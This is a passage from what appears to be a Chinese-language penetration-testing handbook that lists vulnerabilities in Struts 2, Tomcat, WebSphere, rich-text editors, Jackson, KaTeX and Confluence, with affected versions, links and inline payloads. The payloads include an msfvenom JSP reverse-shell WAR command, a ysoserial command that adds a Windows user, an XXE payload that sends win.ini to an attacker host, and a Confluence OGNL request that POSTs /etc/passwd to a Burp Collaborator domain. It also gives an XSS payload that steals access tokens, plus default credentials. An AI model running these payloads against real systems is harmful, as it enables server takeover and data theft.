S2-056 漏洞发生于 Apache Struts 2的 REST 插件，当使用 XStream 组件对 XML 格式的数据包进行反序列化操作，且未对数据内容进行有效验证时，攻击者可通过提交恶意 XML 数据对应用进行远程 DoS 攻击。
影响版本
- Struts 2.1.1 ~ 2.5.14.1
POC | Payload | exp
- iBearcat/S2-056-XStream

S2-057 & CVE-2018-11776

https://cwiki.apache.org/confluence/display/WW/S2-057
描述
该漏洞由 Semmle Security Research team 的安全研究员 Man YueMo 发现.该漏洞是由于在 Struts2 开发框架中使用 namespace 功能定义 XML 配置时,namespace 值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符 namespace,可能导致远程代码执行.
影响版本
- Struts 2.0.4 ~ 2.3.34
- Struts 2.5.0 ~ 2.5.16
POC | Payload | exp
- Ivan1ee/struts2-057-exp
- mazen160/struts-pwn_CVE-2018-11776

S2-059 & CVE-2019-0230

https://cwiki.apache.org/confluence/display/WW/S2-059
描述
Apache Struts 框架, 会对某些特定的标签的属性值，比如 id 属性进行二次解析，所以攻击者可以传递将在呈现标签属性时再次解析的 OGNL 表达式，造成 OGNL 表达式注入。从而可能造成远程执行代码。
影响版本
- Struts 2.0.0 ~ 2.5.20
相关文章
- Struts2 S2-059 漏洞分析
- CVE-2019-0230 s2-059 漏洞分析
POC | Payload | exp
- Struts2 S2-059 远程代码执行漏洞(CVE-2019-0230)
- ramoncjs3/CVE-2019-0230

S2-061 & CVE-2020-17530

https://cwiki.apache.org/confluence/display/WW/S2-061
描述
S2-061 是对 S2-059 的绕过，Struts2 官方对 S2-059 的修复方式是加强 OGNL 表达式沙盒，而 S2-061 绕过了该沙盒。该漏洞影响版本范围是 Struts 2.0.0 到 Struts 2.5.25。
相关文章
POC | Payload | exp
- Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)
- vilPulsar/S2-061

Tapestry

CVE-2021-27850

相关文章
- tapestry 未授权远程命令执行漏洞复现
POC | Payload | exp
- kahla-sec/CVE-2021-27850_POC

Tomcat

官网 : https://tomcat.apache.org/

Tomcat 默认端口为 8080,也可能被改为其他端口,后台管理路径为 /manager/html,后台默认弱口令 admin/admin、tomcat/tomcat 等,若果配置不当,可通过"Tomcat Manager"连接部署 war 包的方式获取 webshell.

搭建教程

Tomcat 搭建

相关文章

Tips

tomcat5 默认有两个角色：tomcat 和 role1。其中账号 both、tomcat、role1 的默认密码都是 tomcat。不过不具备部署应用的权限，默认需要 manager 权限才能够直接部署 war 包.
tomcat6 默认没有配置任何用户以及角色，没办法用默认账号登录.
tomcat7 与6类似
tomcat8 其实从6开始，tomcat 就将默认的用户去掉了
控制台路径
- /manager/status
- /manager/html
- /host-manager/
jar -cf job.war ./job.jsp 生成 war 包
如果应用存在 lfi,可以配合以下几点进一步挖掘信息:
- web应用的配置文件可能在 /webapps/[web应用名]/WEB-INF/classes/ 目录下, xxx.properties 后缀的文件。
  - properties 字典 : https://github.com/ffffffff0x/AboutSecurity/blob/master/Payload/LFI/Fuzz_properties.txt
- tomcat 配置 /Conf/tomcat-users.xml

爆破 Manager APP

Manager 管理平台我们都很熟悉，也是最常见的，包含多个管理模块，开启后方便开发及运维人员对 tomcat 项目发布进行管理。Manager 管理平台默认安装后是没有设置登录口令的，需要在 tomcat-user.xml 文件中进行配置，与上文的 admin 管理平台相同。

在登录 manager 后台时，tomcat 使用的是 Basic 认证方式，在请求的数据包中包含一个 Authorization 字段，该字段的值为账号密码的 base64 编码，口令形式为 username:password

http://user:password@xxx.xxx.xxx.xxx:xxx/manager/html

MSF Module

use auxiliary/scanner/http/tomcat_mgr_login

Tomcat manager 包含 4 个不同的角色：

manager-gui：允许访问 html 页面接口 (即 URL 路径为 / manager/html/*)
manager-script：允许访问纯文本接口 (即 URL 路径为 / manager/text/*)
manager-jmx：允许访问 JMX 代理接口 (即 URL 路径为 / manager/jmxproxy/*)
manager-status：允许访问 Tomcat 只读状态页面 (即 URL 路径为 / manager/status/*)
其中 manager-gui、manager-script、manager-jmx 三个角色均具备 manager-status 角色的权限，即这三种角色权限无需再额外添加 manager-status 权限。实际使用中只需配置 manager-gui 角色通过 html 页面的形式访问管理平台。

manager-jmx

Tomcat 使用 JMX 管理方式，在 Tomcat 的自带应用 manager 就是使用了 JMX 方式来管理 Tomcat，以此完成 Web 应用的动态部署、启动、停止。在 tomcat 的帮助文档中，提供了下面几种方式发送请求获取相应的信息：

query 命令：http://[ip]:[port]/manager/jmxproxy/?qry=
get 命令：http:// [ip]:[port]/manager/jmxproxy/?get=
set 命令：http:// [ip]:[port]/manager/jmxproxy/?set=
invoke 命令：http:// [ip]:[port]/manager/jmxproxy/?invoke=
访问上面的地址，我们就可以看到不同的信息，通过向不同的参数传递特定的参数，也可以获取到一些敏感信息。不加参数时查询到的是所有的 MBeans 的内容，加参数之后就可以查看到具体的 MBeans 的内容。

例如： http://[ip]:[port]/manager/jmxproxy/?qry=*%3atype=User%2c*

该查询可以看到设置的 tomcat-user.xml 中配置的账号密码，甚至还可以通过 set 命令修改账号密码，来设置一个后门账号。

War

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war
strings reverse.war | grep jsp # in order to get the name of the file

样例目录 session 操纵漏洞

Tomcat 在安装部署后，在 webapps 默认存在一个 examples 目录，该目录正如其文件名一样，提供一些示例应用让使用者来了解 Tomcat 的特性及功能。这些样例在业务上线后并没有什么用处，建议部署 tomcat 后，删除其中的样例文件(ROOT, balancer,jsp-examples, servlet-examples, tomcat-docs, webdav)，避免信息泄露和其他潜在的安全风险。

这些样例中的 session 样例(/examples/servlets/servlet/SessionExample)允许用户对 session 进行操纵，因为 session 是全局通用的，所以用户可以通过操纵 session 获取管理员权限，存在一定的安全风险，不过这种基本上只有在一些比较老的不安全系统中才有可能出现，利用条件比较苛刻。

相关文章
- Apache Tomcat样例目录session操纵漏洞

CVE-2016-1240

描述
10月1日,Tomcat 爆出了一个本地提权漏洞。通过该漏洞,攻击者可以通过一个低权限的 Tomcat 用户获得系统的 root 权限。
影响版本
- tomcat:6.0:*
- tomcat:7.0:*
- tomcat:8.0:*
POC | Payload | exp
- Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation

CVE-2016-8735

描述
Oracle 修复了 JmxRemoteLifecycleListener 反序列化漏洞(CVE-2016-3427)。 Tomcat 也使用了 JmxRemoteLifecycleListener 这个监听器,但是 Tomcat 并没有及时升级，存在这个远程代码执行漏洞。
漏洞利用条件
外部需要开启 JmxRemoteLifecycleListener 监听的 10001 和 10002 端口来实现远程代码执行。
影响版本
- Tomcat 9.0.0.M1 ~ 9.0.0.M11
- Tomcat 8.5.0 ~ 8.5.6
- Tomcat 8.0.0.RC1 ~ 8.0.38
- Tomcat 7.0.0 ~ 7.0.72
- Tomcat 6.0.0 ~ 6.0.47
相关文章
- 复现tomcat远程代码执行漏洞(CVE-2016-8735) | 回忆飘如雪
- CVE-2016-8735环境搭建到POC编写

POC | Payload | exp

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 192.168.48.211 10001 Groovy1 "C:\Windows\System32\net.exe user  test 12345 /add "

CVE-2017-12615/12616

描述
2017年9月19日,Apache Tomcat 官方确认并修复了两个高危漏洞,漏洞 CVE 编号:CVE-2017-12615 和 CVE-2017-12616,该漏洞受影响版本为7.0.0-7.0.80之间,官方评级为高危,在一定条件下,攻击者可以利用这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意 JSP 文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险.
- CVE-2017-12615:远程代码执行漏洞
  当 Tomcat 运行在 Windows 操作系统时,且启用了 HTTP PUT 请求方法 (例如,将 readonly 初始化参数由默认值设置为 false) ,攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行.导致服务器上的数据泄露或获取服务器权限.
- CVE-2017-12616:信息泄露漏洞
  当 Tomcat 中启用了 VirtualDirContext 时,攻击者将能通过发送精心构造的恶意请求,绕过设置的相关安全限制,或是获取到由 VirtualDirContext 提供支持资源服务的 JSP 源代码,从而造成代码信息泄露.
漏洞利用条件
- CVE-2017-12615 漏洞利用需要在 Windows 环境,且需要将 readonly 初始化参数由默认值设置为 false,经过实际测试,Tomcat 7.x 版本内 web.xml 配置文件内默认配置无 readonly 参数,需要手工添加,默认配置条件下不受此漏洞影响.
- CVE-2017-12616 漏洞需要在 server.xml 文件配置 VirtualDirContext 参数,经过实际测试,Tomcat 7.x 版本内默认配置无 VirtualDirContext 参数,需要手工添加,默认配置条件下不受此漏洞影响.
影响版本
- CVE-2017-12615 影响版本 : Apache Tomcat 7.0.0 ~ 7.0.79 (windows 环境)
- CVE-2017-12616 影响版本 : Apache Tomcat 7.0.0 ~ 7.0.80
相关文章
- CVE-2017-12615/CVE-2017-12616:Tomcat信息泄漏和远程代码执行漏洞分析报告

POC | Payload | exp

PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

CVE-2017-12617

描述
运行启用了 HTTP PUT 的 Apache Tomcat 特定版本时(例如，通过将默认 servlet 的只读初始化参数设置为 false)可以通过特制请求将 JSP 文件上载到服务器。然后可以请求此 JSP，并且服务器将执行其中包含的所有代码。
影响版本
- Apache Tomcat 7.0.0 ~ 7.0.81
- Apache Tomcat 8.0.0 ~ 8.0.17
相关文章
- CVE-2017-12617-Tomcat远程代码执行漏洞复现测试
POC | Payload | exp
- cyberheartmi9/CVE-2017-12617

MSF Module

use exploit/multi/http/tomcat_jsp_upload_bypass

CVE-2018-11784 Tomcat URL跳转漏洞

描述
当 Apache Tomcat 版本 9.0.0.M1 到 9.0.11、8.5.0 到 8.5.33 和 7.0.23 到 7.0.90 中的默认 servlet 返回到一个目录的重定向(例如，当用户请求'/foo'时重定向到'/foo/’)，一个特制的 URL 可用于导致重定向生成到攻击者选择的任何 URI。
影响版本
- Apache Tomcat 9.0.0.M1 ~ 9.0.11
- Apache Tomcat 8.5.0 ~ 8.5.33
- Apache Tomcat 7.0.23 ~ 7.0.90
相关文章
- Tomcat URL跳转漏洞【CVE-2018-11784】

POC | Payload | exp

http://[ip:port]//[baidu.com]/..;/[可访问目录/可访问目录]

默认存在的 docs 目录也可以被利用，例

http://[ip:port]//[baidu.com]/..;/docs/images

CVE-2019-0232

描述
该漏洞是由于 Tomcat CGI 将命令行参数传递给 Windows 程序的方式存在错误，使得 CGIServlet 被命令注入影响。
该漏洞只影响 Windows 平台，要求启用了 CGIServlet 和 enableCmdLineArguments 参数。但是 CGIServlet 和 enableCmdLineArguments 参数默认情况下都不启用。
影响版本
- Apache Tomcat 7.0.0 ~ 7.0.93
- Apache Tomcat 8.0.0 ~ 8.5.39
- Apache Tomcat 9.0.1 ~ 9.0.17
相关文章
- CVE-2019-0232:Apache Tomcat RCE漏洞分析
- 复现CVE-2019-0232过程中遇到的坑 Apache Tomcat高危远程代码执行漏洞
POC | Payload | exp
- pyn3rd/CVE-2019-0232
- jas502n/CVE-2019-0232

CVE-2020-1938 && CNVD-2020-10487 Apache Tomcat Ghostcat 漏洞

描述
Apache Tomcat 会开启 AJP 连接器,方便与其他 Web 服务器通过 AJP 协议进行交互。由于 Tomcat 本身也内含了 HTTP 服务器，因此也可以视作单独的 Web 服务器。
但 Apache Tomcat在 AJP 协议的实现上存在漏洞,导致攻击者可以通过发送恶意的 AJP 请求,可以读取或者包含 Web 应用根目录下的任意文件,如果配合文件上传任意格式文件，将可能导致任意代码执行(RCE).该漏洞利用 AJP 服务端口实现攻击,未开启 AJP 服务对外不受漏洞影响(tomcat 默认将 AJP 服务开启并绑定至 0.0.0.0/0)。
此漏洞为文件包含漏洞，攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件，如：webapp 配置文件、源代码等。
影响版本
- Apache Tomcat = 6
- 7 <= Apache Tomcat < 7.0.100
- 8 <= Apache Tomcat < 8.5.51
- 9 <= Apache Tomcat < 9.0.31
相关文章
POC | Payload | exp
- 0nise/CVE-2020-1938
- YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
修复建议
- 请尽快更新 Tomcat 到安全版本。
- 临时禁用 AJP 协议端口,打开 Tomcat 配置文件 <CATALINA_BASE>/conf/service.xml,注释掉如下行：
```
<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
```
  修改完后，重启 tomcat 即可。
- 除以上措施外，也可采用防火墙等方法阻止不可信任的来源访问 Tomcat AJP Connector 端口。

tomcat cluster sync-session

描述
tomcat 使用了自带 session 同步功能时，不安全的配置(没有使用 EncryptInterceptor)导致存在的反序列化漏洞，通过精心构造的数据包，可以对使用了 tomcat 自带 session 同步功能的服务器进行攻击。
POC | Payload | exp
- threedr3am/tomcat-cluster-session-sync-exp

CVE-2020-9484 Session 反序列化代码执行漏洞

描述
当使用 tomcat 时，如果使用了 tomcat 提供的 session 持久化功能，如果存在文件上传功能，恶意请求者通过一个流程，将能发起一个恶意请求造成服务端远程命令执行。
相关文章
- CVE-2020-9484 Tomcat RCE漏洞分析
- CVE-2020-9484: Apache Tomcat Remote Code Execution Vulnerability Alert
POC | Payload | exp
- IdealDreamLast/CVE-2020-9484
- masahiro331/CVE-2020-9484

CVE-2020-13935

描述
Apache Tomcat 中的 WebSocket 存在安全漏洞，该漏洞源于程序没有正确验证 payload 的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。
影响版本
- Apache Tomcat 10.0.0-M1-10.0.0-M6
- Apache Tomcat 9.0.0.M1-9.0.36
- Apache Tomcat 8.5.0-8.5.56
- Apache Tomcat 7.0.27-7.0.104
相关文章
- CVE-2020-13935复现与浅析

POC | Payload | exp

RedTeamPentesting/CVE-2020-13935

CVE-2020-13935.exe ws://x.x.x.x:xxxx/examples/websocket/echoStrreamAnnotation

uWSGI

uWSGI 未授权访问漏洞

相关文章
- https://github.com/vulhub/vulhub/blob/master/uwsgi/unacc/README.zh-cn.md

Weblogic

Weblogic

Websphere

CVE-2014-0910

POC | Payload | exp
- IBM Websphere Portal - Persistent Cross-Site Scripting

CVE-2015-7450

POC | Payload | exp
- websphere_rce.py
- websphereCVE-2015-7450

CVE-2019-4279 Websphere ND远程命令执行

相关文章
- Websphere ND远程命令执行分析以及构造RpcServerDispatcher Payload(CVE-2019-4279)

CVE-2020-4643 WebSphere XXE 漏洞

相关文章
- WebSphere XXE 漏洞分析(CVE-2020-4643)

POC | Payload | exp

xml如下：
<!DOCTYPE x [
<!ENTITY % aaa SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % bbb SYSTEM "http://yourip:8000/xx.dtd">
%bbb;
]>
<definitions name="HelloService" xmlns="http://schemas.xmlsoap.org/wsdl/">
&ddd;
</definitions>

xx.dtd如下：
<!ENTITY % ccc '<!ENTITY ddd '<import namespace="uri" location="http://yourip:8000/xxeLog?%aaa;"/>'>'>%ccc;

Websphere Portal ssrf

相关文章
- Turning bad SSRF to good SSRF: Websphere Portal

组件

编辑器

手册

编辑器漏洞手册

ewebeditor

官网 : http://www.ewebeditor.net/

相关文章

ewebeditor 编辑器漏洞总结

常用路径

Admin_Login.asp
Admin_Default.asp
Admin_Style.asp
Admin_UploadFile.asp
Upload.asp
Admin_ModiPwd.asp
eWebEditor.asp
db/ewebeditor.mdb
ewebeditor/login_admin.asp
eweb/login_admin.asp
editor/login_admin.asp

FCKeditor

官网 : https://ckeditor.com/

相关文章

Fckeditor上传漏洞利用拿shell总结

常用路径

FCKeditor/_samples/default.html
FCKeditor/_whatsnew.html
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.test.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp

.net 目录遍历

/FCkeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=

kindeditor

官网 : http://kindeditor.net/

kindeditor<=4.1.5 上传漏洞

相关文章
- kindeditor<=4.1.5上传漏洞复现
- 大批量Kindeditor文件上传事件的漏洞分析
漏洞修复
1. 直接删除 upload_json.* 和 file_manager_json.*
2. 升级 kindeditor 到最新版本

ueditor

相关文章
- 百度Ueditor编辑器漏洞总结

ueditor ssrf

相关文章
- UEditor 1.4.3.3验证SSRF漏洞提高DNS rebinding成功率
- 九维团队-绿队(改进)| Java代码审计之SSRF

POC | Payload | exp

/ueditor/jsp/getRemoteImage.jsp?upfile=http://127.0.0.1/favicon.ico?.jpg

/module/ueditor/php/controller.php?action=catchimage&source%5b%5d=http://www.baidu.com"
/module/ueditor/jsp/controller.jsp?action=catchimage&source%5b%5d=http://www.baidu.com"

CNVD-2017-20077 ueditor 上传漏洞

序列化

相关文章

无损检测Fastjson DoS漏洞以及盲区分Fastjson与Jackson组件

fastjson

fastjson

Jackson

FasterXML Jackson 是美国 FasterXML 公司的一款适用于 Java 的数据处理工具。

主要的几个 jar 包：

jackson-core : 核心包
jackson-annotations : 注解包
jackson-databind : 数据绑定包

CVE-2017-7525 Jackson-databind 反序列化漏洞

描述
Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启)，当 json 字符串转换的 Target class 中有 polymorph fields，即字段类型为接口、抽象类或 Object 类型时，攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类)，来实现实例化指定的类，借助某些特殊的 class，如 TemplatesImpl，可以实现任意代码执行。
相关文章
- Jackson-databind 反序列化漏洞(CVE-2017-7525)

CVE-2017-17485 Jackson-databind 反序列化

描述
FasterXML Jackson 是美国 FasterXML 公司的一款适用于 Java 的数据处理工具。jackson-databind 是其中的一个具有数据绑定功能的组件。
FasterXML Jackson-databind 2.8.10 及之前版本和 2.9.x 版本至 2.9.3 版本中存在代码问题漏洞。远程攻击者可通过向 ObjectMapper 的 readValue 方法发送恶意制作的 JSON 输入并绕过黑名单利用该漏洞执行代码。
相关文章
- CVE-2017-17485 Jackson-databind 反序列化

CVE-2019-12086

描述
使用了 jackson-databind 2.x before 2.9.9 的 Java 应用，如果 ClassPath 中有 com.mysql.cj.jdbc.admin.MiniAdmin(存在于 MySQL 的 JDBC 驱动中)这个类，那么 Java 应用所在的服务器上的文件，就可能被任意读取并传送到恶意的MySQL Server。
相关文章
- 分析Jackson的安全漏洞CVE-2019-12086

CVE-2019-12384 Jackson-databind RCE And SSRF

描述
6月21日，Redhat 官方发布 jackson-databind 漏洞(CVE-2019-12384)安全通告，多个 Redhat 产品受此漏洞影响，CVSS 评分为 8.1，漏洞利用复杂度高。7月22日，安全研究员 Andrea Brancaleoni 对此漏洞进行分析，并公布了该漏洞的分析文章。
该漏洞是由于 Jackson 黑名单过滤不完整而导致，当开发人员在应用程序中通过 ObjectMapper 对象调用 enableDefaultTyping 方法时，程序就会受到此漏洞的影响，攻击者就可利用构造的包含有恶意代码的 json 数据包对应用进行攻击，直接获取服务器控制权限。
影响版本
- Jackson-databind 2.X < 2.9.9.1
相关文章
- CVE-2019-12384：Jackson反序列化漏洞分析
- Jackson CVE-2019-12384 RCE 复现记录
POC | Payload | exp
- jas502n/CVE-2019-12384
- MagicZer0/Jackson_RCE-CVE-2019-12384

CVE-2020-8840 FasterXML/jackson-databind 远程代码执行漏洞

影响版本
- Jackson-databind 2.X < 2.9.10.2
POC | Payload | exp
- jas502n/CVE-2020-8840

CVE-2020-9547 FasterXML/jackson-databind 远程代码执行漏洞

影响版本
- Jackson-databind 2.X < 2.9.10.4
POC | Payload | exp
- fairyming/CVE-2020-9547

CVE-2020-9548 FasterXML/jackson-databind 远程代码执行漏洞

影响版本
- Jackson-databind 2.X < 2.9.10.4
POC | Payload | exp
- fairyming/CVE-2020-9548

CVE-2020-11113 远程代码执行漏洞

影响版本
- Jackson-databind < 2.9.10.4
相关文章
- Jackson-databind-2670远程代码执行漏洞简单分析

CVE-2020-35728

POC | Payload | exp
- Al1ex/CVE-2020-35728

CVE-2020-36179 Jackson-databind SSRF&RCE

影响版本
- Jackson-databind < 2.9.10.7
相关文章
- CVE-2020-36179:Jackson-databind SSRF&RCE
POC | Payload | exp
- Al1ex/CVE-2020-36179

Xstream

相关文章

XStream反序列化组件攻击分析

CVE-2020-26217

POC | Payload | exp
- https://x-stream.github.io/CVE-2020-26217.html

CVE-2020-26258

相关文章
- https://x-stream.github.io/CVE-2020-26258.html
- CVE-2020-26258&26259：XStream漏洞复现

CVE-2020-26259 任意文件删除

POC | Payload | exp
- https://x-stream.github.io/CVE-2020-26259.html

CVE-2021-29505

相关文章
- CVE-2021-29505：XStream反序列化命令执行漏洞复现

JavaScript库

jQuery

检测工具

jQuery versions with known weaknesses - 在线查找已知版本的 jQuery 漏洞

mahp/jQuery-with-XSS

将代码中 src 后的链接修改为自己要验证的 js 地址链接。

CVE-2020-11022/11023 jQuery XSS漏洞

详情
在大于或等于 1.2 且在 3.5.0 之前的 jQuery 版本中，即使执行了消毒(sanitize)处理，也仍会执行将来自不受信任来源的 HTML 传递给 jQuery 的 DOM 操作方法(即 html()、.append() 等)，从而导致 xss 漏洞。
CVE-2020-11022/CVE-2020-11023: jQuery 3.5.0 Security Fix details
jQuery XSS漏洞 CVE-2020-11022/11023

CVE-2018-9206 jQuery-File-Upload 未授权任意文件上传漏洞

相关文章
- CVE-2018-9206渗透实战
- jQuery-File-Upload—三个漏洞的故事
POC | Payload | exp
- Stahlz/JQShell
- Den1al/CVE-2018-9206

KaTeX

xss

相关链接
案例
- Sec-IN社区安全测试——文章正文XSS

POC | Payload | exp

$$ \<script id="iplog">x=new XMLHttpRequest(); x.open("GET",
"https://afternoon-fjord-12487.herokuapp.com/");
x.send();document.getElementById("id").parent.parent.style = "display:none"
</script> $$

$$ \<input type=image src=/static/css/img/logo.23d7be3.svg
onload=alert(localStorage.access_token)> $$

其他

AjaxPro.NET

CVE-2021-23758 AjaxPro.NET反序列化漏洞

相关文章
- 开源组件漏洞之CVE-2021-23758 AjaxPro.NET反序列化漏洞

exiftool

CVE-2021-22204

相关案例
- Remote Code Execution via VirusTotal Platform

Ghostscript

CVE-2019-6116 沙箱绕过(命令执行)漏洞

POC | Payload | exp
- GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116)

GhostScript-9.50 RCE

相关文章
- Ghostscript沙箱绕过(CVE-2021-3781)分析
POC | Payload | exp
- duc-nt/RCE-0-day-for-GhostScript-9.50

ImageMagick

CVE-2016-3714

POC | Payload | exp
- ImageTragick/PoCs
- https://github.com/vulhub/vulhub/blob/master/imagemagick/imagetragick/README.zh-cn.md

Log4j

Log4j

PrimeFaces

CVE-2017-1000486

相关文章
- PrimeFaces and EL Injection Update
POC | Payload | exp
- pimps/CVE-2017-1000486

webuploader

项目地址 : https://github.com/fex-team/webuploader

webuploader-v-0.1.15 组件存在文件上传漏洞(未授权)

POC | Payload | exp
- jas502n/webuploader-0.1.15-Demo

dompdf

dompdf-rce

相关文章
- 利用dompdf将XSS升级为RCE
POC | Payload | exp
- positive-security/dompdf-rce - RCE exploit for dompdf

服务

相关文章

DevOps风险测绘之代码篇

Adminer

Adminer≤4.6.2任意文件读取漏洞

相关文章
- Adminer≤4.6.2任意文件读取漏洞

ApiSix

CVE-2021-43557 Request Uri目录穿越漏洞

相关文章
- Apache ApiSix Request Uri目录穿越漏洞复现(CVE-2021-43557)
POC | Payload | exp
- xvnpw/k8s-CVE-2021-43557-poc

CVE-2021-45232 Apache APISIX Dashboard 认证绕过漏洞

相关文章
- CVE-2021-45232 Apache APISIX Dashboard 认证绕过漏洞分析
- CVE-2021-45232分析(APISIX网关未授权访问)

Apollo

项目地址 : https://github.com/apolloconfig/apollo

fofa : icon_hash="11794165"
fofa : title="Apollo配置中心"
fofa : body="apollo-adminservice"

未授权访问

相关文章
- Apollo 配置中心未授权获取配置漏洞利用

POC | Payload | exp

# apollo-adminservice
# 1. 获取所有的应用基本信息(包含 appId)
xxx.xxx.xxx.xxx:8090/apps

# apollo-adminservice
# 2. 获取相关 appId 的所有 cluster
xxx.xxx.xxx.xxx:8090/apps/<appId>/clusters

# apollo-adminservice
# 3. 获取相关 appId 的 namespaces
xxx.xxx.xxx.xxx:8090/apps/<appId>/appnamespaces

# apollo-configservice
# 4. 组合 appId cluster namespaceName 获取配置 configurations
xxx.xxx.xxx.xxx:8080/configs/<appId>/<cluster>/<namespaceName>

AppWeb

CVE-2018-8715 AppWeb认证绕过漏洞

描述
其7.0.3之前的版本中，对于 digest 和 form 两种认证方式，如果用户传入的密码为 null(也就是没有传递密码参数)，appweb 将因为一个逻辑错误导致直接认证成功，并返回 session。
POC | Payload | exp
- AppWeb认证绕过漏洞(CVE-2018-8715) - (未复现成功)

Appspace-Core

CVE-2021-27670

POC | Payload | exp

/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://xxxx.dnslog.cn

Bitbucket

CVE-2022-36804

POC | Payload | exp
- Bitbucket Server CVE-2022-36804 漏洞分析
- notdls/CVE-2022-36804

Cacti

Fofa: app="cacti"

默认密码

admin   admin

CVE-2020-8813 Cacti v1.2.8 远程命令执行漏洞

相关文章
- Cacti v1.2.8 authenticated Remote Code Execution (CVE-2020-8813)
POC | Payload | exp
- mhaskar/CVE-2020-8813

celery

项目地址 : https://github.com/celery/celery

相关文章

Celery Redis未授权访问利用

Commvault

CVE-2021-34993

相关文章
- Commvault CVE-2021-34993 从认证绕过到任意文件下载

Confluence

官网 : https://www.atlassian.com/software/confluence

Confluence 是一个专业的企业知识管理与协同软件，也可以用于构建企业 wiki。使用简单，强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论，信息推送。

相关文章

Confluence利用指南

相关工具

BeichenDream/PostConfluence - 哥斯拉 Confluence 后渗透插件

CVE-2019-3394 Confluence 文件读取漏洞

相关文章
- Confluence 文件读取漏洞(CVE-2019-3394)分析

CVE-2019-3396 Confluence Wiki 远程代码执行

相关文章
- Confluence 未授权 RCE (CVE-2019-3396) 漏洞分析
POC | Payload | exp
- jas502n/CVE-2019-3396
- Yt1g3r/CVE-2019-3396_EXP

CVE-2019-3398 Atlassian Confluence Download Attachments Remote Code Execution

描述
Confluence Server 和 Data Center 在 downloadallattachments 资源中存在路径穿越漏洞。在 Page 或 Blogs 具有添加附件权限的用户，或具有创建新空间或个人空间权限的用户，或对某空间具有“管理员”权限的用户可利用此路径穿越漏洞将文件写入任意位置。一定条件下可以执行任意代码。
影响版本
- Atlassian confluence 2.0.0 ~ 6.6.13
- Atlassian confluence 6.7.0 ~ 6.12.4
- Atlassian confluence 6.13.0 ~ 6.13.4
- Atlassian confluence 6.14.0 ~ 6.14.3
POC | Payload | exp
- https://www.peerlyst.com/posts/cve-2019-3398-atlassian-confluence-download-attachments-remote-code-execution-juniper-networks?utm_source=twitter&utm_medium=social&utm_content=peerlyst_post&utm_campaign=peerlyst_shared_post

CVE-2021-26084

相关文章
- CVE-2021-26084-Confluence命令执行全版本内存马注入

POC | Payload | exp

POST /pages/createpage-entervariables.action HTTP/1.1
Host: 127.0.0.1:8090
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 215

queryString=lalalala%5cu0027,(linkCreation)(0xd0ff90),%5cu0027lalalala&linkCreation=@java.lang.Runtime@getRuntime().exec('curl -X POST --data-binary @/etc/passwd xxx.burpcollaborator.net')

CVE-2021-26085

相关文章
- Confluence 敏感信息泄漏复现(CVE-2021-26085)
- [CVE-2021-26085] Confluence /s/路径的信息泄露(受限)
影响版本
- Atlassian confluence < 7.4.10
- Atlassian confluence 7.5.0 ≤ ~ < 7.12.3

POC | Payload | exp

https://github.com/chaitin/xray/pull/1478

/s/123cfx/_/;/WEB-INF/web.xml
/s/123cfx/_/;/WEB-INF/decorators.xml
/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties
/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml

CVE-2022-26138

POC | Payload | exp

disabledsystemuser
disabled1system1user6708

Crowd

官网 : https://www.atlassian.com/software/crowd

Atlassian Crowd 是一套基于 Web 的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center 是 Crowd 的集群部署版。

CVE-2019-11580 Atlassian Crowd 未授权访问漏洞

描述
Atlassian Crowd 和 Crowd Data Center 在其某些发行版本中错误地启用了 pdkinstall 开发插件，使其存在安全漏洞。攻击者利用该漏洞可在未授权访问的情况下对 Atlassian Crowd 和 Crowd Data Center 安装任意的恶意插件，执行任意代码/命令，从而获得服务器权限。
影响版本
- Atlassian Crowd 2.1.0 ~ 3.0.5
- Atlassian Crowd 3.1.0 ~ 3.1.6
- Atlassian Crowd 3.2.0 ~ 3.2.8
- Atlassian Crowd 3.3.0 ~ 3.3.5
- Atlassian Crowd 3.4.0 ~ 3.4.4
相关文章
